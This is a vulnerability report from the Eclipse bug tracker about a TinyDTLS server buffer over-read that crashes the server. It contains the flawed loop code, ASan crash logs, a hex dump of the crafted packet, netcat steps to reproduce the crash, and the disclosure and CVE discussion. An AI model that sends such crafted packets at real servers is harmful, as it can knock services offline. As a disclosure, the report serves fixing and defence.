Bug 544824 - DTLS server - buffer overflow leading to crash (dtls_update_parameters)
Summary: DTLS server - buffer overflow leading to crash (dtls_update_parameters)
Status: RESOLVED FIXED
Alias: None
Product: Community
Classification: Eclipse Foundation
Component: Vulnerability Reports
Version: unspecified
Hardware: All All
Importance: P3 major
Target Milestone: ---
Assignee: Security vulnerabilities reported against Eclipse projects CLA
QA Contact:
URL:
Whiteboard:
Keywords: security
Depends on:
Blocks:
Reported: 2019-02-26 08:57 EST by Cve Reporting CLA
Modified: 2020-01-13 06:58 EST

See Also:


Attachments
DTLS packet causing crash (80 bytes, image/x-panasonic-raw)
2019-02-26 08:57 EST, Cve Reporting CLA
Description Cve Reporting CLA 2019-02-26 08:57:22 EST
Created attachment 277693
DTLS packet causing crash

The TinyDTLS DTLS server incorrectly handles incoming network messages, leading to a buffer over-read and a crash of the server.
After processing a crafted packet, the server searches for a known cipher description provided in the DTLS handshake message using a loop with a wrong finish condition:

  uint8 *data;
  ...
  int i, j;
  ...
  i = dtls_uint16_to_int(data); // size of the cipher_suites vector, taken from the packet
  ...
  ok = 0;
  while (i && !ok) {            // i != 0 is the only stop condition; there is no lower bound
    config->cipher = dtls_uint16_to_int(data);
    ok = known_cipher(ctx, config->cipher, 0);
    i -= sizeof(uint16);        // an i that is not a multiple of the step never reaches 0
    data += sizeof(uint16);
  }

The variable i goes below zero because it is decremented by 4 while its value is not divisible by 4, and the following condition is used: while (i && !ok) ...
That leads to a buffer over-read and a crash of the whole DTLS server via a SIGSEGV signal.
If the memory after the allocated buffer contains a description of a valid cipher, the above loop will finish and can potentially disclose the value of memory.

Proposed CVSS 3.0 score:

7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Error message WITHOUT Address Sanitizer:
--------------------------------------------------------------------------------------
./tinydtls_0.9_master/tests/dtls-server -p 5555 -v 10
Feb 26 13:27:16 DEBG got 80 bytes from port 52467
Feb 26 13:27:16 DEBG dtls_handle_message: PEER NOT FOUND
Feb 26 13:27:16 DEBG peer addr: [...]:52467
Feb 26 13:27:16 DEBG got packet 22 (77 bytes)
Feb 26 13:27:16 DEBG receive header: (13 bytes):
00000000 16 FE FD 00 A7 F6 40 58  00 40 FF 00 40 
Feb 26 13:27:16 DEBG receive unencrypted: (64 bytes):
00000000 01 F6 40 42 4D 00 00 00  00 00 00 3F 3F 3F 3F 3F 
00000010 3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F 
00000020 3F 3F 3F 3F 3F 3F 3F 3F  3F 40 16 16 FE FD 00 00 
00000030 00 0D 00 4D 00 00 40 16  F6 40 01 00 00 00 58 4D 

Feb 26 13:27:16 DEBG received handshake packet of type: client_hello (1)
Feb 26 13:27:16 DEBG handle handshake packet of type: client_hello (1)
Feb 26 13:27:16 DEBG create cookie: (16 bytes): 7715AC53E94D8FA898000DC336824940
Feb 26 13:27:16 WARN error while fetching the cookie, err: 0
Feb 26 13:27:16 DEBG creating new peer
Feb 26 13:27:16 DEBG dtls_new_peer: [...]:52467
Feb 26 13:27:16 DEBG DTLSv12: initialize HASH_SHA256
Feb 26 13:27:16 DEBG clear MAC
Segmentation fault
--------------------------------------------------------------------------------------

Error message WITH Address Sanitizer:
--------------------------------------------------------------------------------------
./tests/dtls-server -p 5555 -v 10
Feb 26 12:53:48 DEBG got 80 bytes from port 52559
Feb 26 12:53:48 DEBG dtls_handle_message: PEER NOT FOUND
Feb 26 12:53:48 DEBG peer addr: [...]:52559
Feb 26 12:53:48 DEBG got packet 22 (77 bytes)
Feb 26 12:53:48 DEBG receive header: (13 bytes):
00000000 16 FE FD 00 A7 F6 40 58  00 40 FF 00 40 
Feb 26 12:53:48 DEBG receive unencrypted: (64 bytes):
00000000 01 F6 40 42 4D 00 00 00  00 00 00 3F 3F 3F 3F 3F 
00000010 3F 3F 3F 3F 3F 3F 3F 3F  3F 3F 3F 3F 3F 3F 3F 3F 
00000020 3F 3F 3F 3F 3F 3F 3F 3F  3F 40 16 16 FE FD 00 00 
00000030 00 0D 00 4D 00 00 40 16  F6 40 01 00 00 00 58 4D 

Feb 26 12:53:48 DEBG received handshake packet of type: client_hello (1)
Feb 26 12:53:48 DEBG handle handshake packet of type: client_hello (1)
e = 36
dtls_get_fragment_length(DTLS_HANDSHAKE_HEADER(msg)) - e = 27
Feb 26 12:53:48 DEBG create cookie: (16 bytes): 65830D94F6A9CC2A865EB4E060BD21F5
Feb 26 12:53:48 WARN error while fetching the cookie, err: 0
Feb 26 12:53:48 DEBG creating new peer
Feb 26 12:53:48 DEBG dtls_new_peer: [...]:52559
Feb 26 12:53:48 DEBG DTLSv12: initialize HASH_SHA256
Feb 26 12:53:48 DEBG clear MAC
// additional debug messages displaying variables i and data from dtls_update_parameters
i = 13 data = 0x62e0df 
i = 11 data = 0x62e0e1 
i = 9 data = 0x62e0e3
i = 7 data = 0x62e0e5 
i = 5 data = 0x62e0e7 
i = 3 data = 0x62e0e9 
i = 1 data = 0x62e0eb 
i = -1 data = 0x62e0ed 
i = -3 data = 0x62e0ef 
i = -5 data = 0x62e0f1  
...
i = -1319 data = 0x62e613 
i = -1321 data = 0x62e615 
i = -1323 data = 0x62e617 
=================================================================
==27017==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000062e618 at pc 0x00000040c451 bp 0x7ffda7c72970 sp 0x7ffda7c72960
READ of size 1 at 0x00000062e618 thread T0
    #0 0x40c450 in dtls_uint16_to_int tinydtls_0.9/numeric.h:94
    #1 0x40c450 in dtls_update_parameters tinydtls_0.9/dtls.c:1074
    #2 0x40c450 in handle_handshake_msg tinydtls_0.9/dtls.c:3459
    #3 0x4102cc in handle_handshake tinydtls_0.9/dtls.c:3549
    #4 0x4102cc in dtls_handle_message tinydtls_0.9/dtls.c:3936
    #5 0x402dc9 in dtls_handle_read tinydtls_0.9/tests/dtls-server.c:177
    #6 0x402dc9 in main tinydtls_0.9/tests/dtls-server.c:352
    #7 0x7f1ab363582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #8 0x401ba8 in _start (tinydtls_0.9/tests/dtls-server+0x401ba8)

0x00000062e618 is located 40 bytes to the left of global variable 'addrstr' defined in 'dtls-server.c:185:15' (0x62e640) of size 256
0x00000062e618 is located 0 bytes to the right of global variable 'buf' defined in 'dtls-server.c:154:16' (0x62e0a0) of size 1400
SUMMARY: AddressSanitizer: global-buffer-overflow tinydtls_0.9/numeric.h:94 dtls_uint16_to_int
Shadow bytes around the buggy address:
  0x0000800bdc70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdc80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdc90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdcb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0000800bdcc0: 00 00 00[f9]f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0000800bdcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800bdce0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
  0x0000800bdcf0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0000800bdd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 f9
  0x0000800bdd10: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==27017==ABORTING

--------------------------------------------------------------------------------------

Reproduction:

1. Compile tinydtls with Address Sanitizer by enabling the compilation flag -fsanitize=address (using ASan is not mandatory for reproduction, but it gives more information about the crash).

2. Run the DTLS server:
    ./tinydtls_0.9/tests/dtls-server -p 5555 -v 10

3. Send the attached crafted message, e.g. using netcat:
    netcat -u $IP 5555 < crash_002_dtls_update_parameters.raw
    where $IP is the IP of the test server
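The loop described in the report, modelled as an added C example (not tinydtls code and not the project's fix): the reported form with a step bound so the model terminates, beside a checked form that rejects a cipher_suites length that is odd or longer than the remaining data. The known_cipher() stand-in, the suite id 0xC0A8 and the two ClientHello fragments are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Added example, not tinydtls code: a memory-safe model of the cipher_suites
 * walk in dtls_update_parameters, in the reported form and a checked form. */

/* Same big-endian decode as tinydtls' dtls_uint16_to_int(). */
static int be16(const uint8_t *p) { return (p[0] << 8) | p[1]; }

/* Stand-in for known_cipher(): one constructed suite id counts as known. */
#define KNOWN_SUITE 0xC0A8
static int known_cipher(int suite) { return suite == KNOWN_SUITE; }

/* Reported loop: `i` is the attacker-controlled vector length and the test is
 * `i && !ok`, so a length that is not a multiple of 2 skips zero and the walk
 * continues past the buffer. Reads outside `buf` are only counted in
 * *oob_reads (the real code performs them and crashes), and max_steps bounds
 * the loop so the model terminates. Returns 1 if a known suite matched. */
static int walk_reported(const uint8_t *buf, size_t len, int max_steps, int *oob_reads) {
  int i = be16(buf);              /* length of cipher_suites, from the packet */
  size_t off = 2;                 /* the `data` pointer, as an offset into buf */
  int ok = 0, steps = 0;
  *oob_reads = 0;
  while (i && !ok && steps < max_steps) {
    int suite = 0;
    if (off + 2 <= len) suite = be16(buf + off);
    else (*oob_reads)++;          /* this read would leave the buffer */
    ok = known_cipher(suite);
    i -= 2;                       /* sizeof(uint16) */
    off += 2;
    steps++;
  }
  return ok;
}

/* Checked form (an assumption here, not the project's fix): the vector length
 * must fit in the remaining data and be a multiple of the 2-byte suite size,
 * and the loop test is i > 0. Returns -1 malformed, 1 match, 0 no match. */
static int walk_checked(const uint8_t *buf, size_t len) {
  if (len < 2) return -1;
  int i = be16(buf);
  if (i % 2 != 0 || (size_t)i + 2 > len) return -1;
  for (size_t off = 2; i > 0; i -= 2, off += 2)
    if (known_cipher(be16(buf + off))) return 1;
  return 0;
}

/* Constructed inputs: an odd length (5) as in the crash, and a well-formed vector. */
static const uint8_t odd_hello[]  = {0x00, 0x05, 0x00, 0x01, 0x00, 0x02, 0x00};
static const uint8_t good_hello[] = {0x00, 0x04, 0x00, 0x01, 0xC0, 0xA8};
```

With a step bound of 10, the reported loop on odd_hello performs 8 of its 10 reads outside the 7-byte buffer and never matches, while the checked form rejects the same input before reading any suite.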
Comment 1 Cve Reporting CLA 2019-05-03 05:18:59 EDT
We have postponed the release of the payload for this vulnerability in the Cotopaxi framework (https://github.com/samsung/cotopaxi).
Please provide any information on when this issue will be fixed.
If there is no response for 90 days from the report date (26th of February 2019), we will release it to the public.
Comment 2 Wayne Beaton CLA 2019-05-14 14:00:34 EDT
Project team, there's help here:

https://www.eclipse.org/projects/handbook/
Comment 3 Cve Reporting CLA 2019-07-11 11:49:07 EDT
Please provide any information on when this issue will be fixed.
We will release the findings to the public before Black Hat USA (August 2019).
Comment 4 Wayne Beaton CLA 2019-07-18 16:15:01 EDT
I've removed the "committers only" flag to disclose per the security policy.
Comment 5 Olaf Bergmann CLA 2019-07-26 03:25:30 EDT
This bug has been fixed in https://github.com/eclipse/tinydtls/commit/494a40dfbb174930ca616e560532d52549736b42

This commit will be merged into the master branch as well.
Comment 6 Wayne Beaton CLA 2019-07-29 15:33:49 EDT
Olaf, do you want to assign a CVE to this vulnerability?

If yes, the steps are described here:

https://www.eclipse.org/projects/handbook/#vulnerability-cve
Comment 7 Olaf Bergmann CLA 2019-07-30 06:50:59 EDT
Thank you for pointing this out. As the code has not even had its initial release, I do not think that a CVE is necessary this time.
Comment 8 Cve Reporting CLA 2019-07-30 09:32:17 EDT
As the vulnerability was reported 154 days ago and was already made public 12 days ago, it is high time to assign a CVE to it.
Comment 9 Cve Reporting CLA 2020-01-07 08:35:44 EST
Please register this issue in CVE database.
Comment 10 Cve Reporting CLA 2020-01-09 06:56:08 EST
This vulnerability affects the following versions of tinydtls:
- 0.9 (master)
- 0.8.2
- 0.8.1
- 0.3.1
Comment 11 Wayne Beaton CLA 2020-01-10 16:41:19 EST
(In reply to Cve Reporting from comment #10)
> This vulnerability affects the following versions of tinydtls:
> - 0.9 (master)
> - 0.8.2
> - 0.8.1
> - 0.3.1

From where did you obtain these versions?

Eclipse tinydtls has engaged in no formal releases per the Eclipse Development Process. Nor do I see any tags or releases in their repository.
Comment 12 Cve Reporting CLA 2020-01-13 06:58:10 EST
Versions below 0.9 were taken from the SourceForge repository (https://sourceforge.net/projects/tinydtls/files/).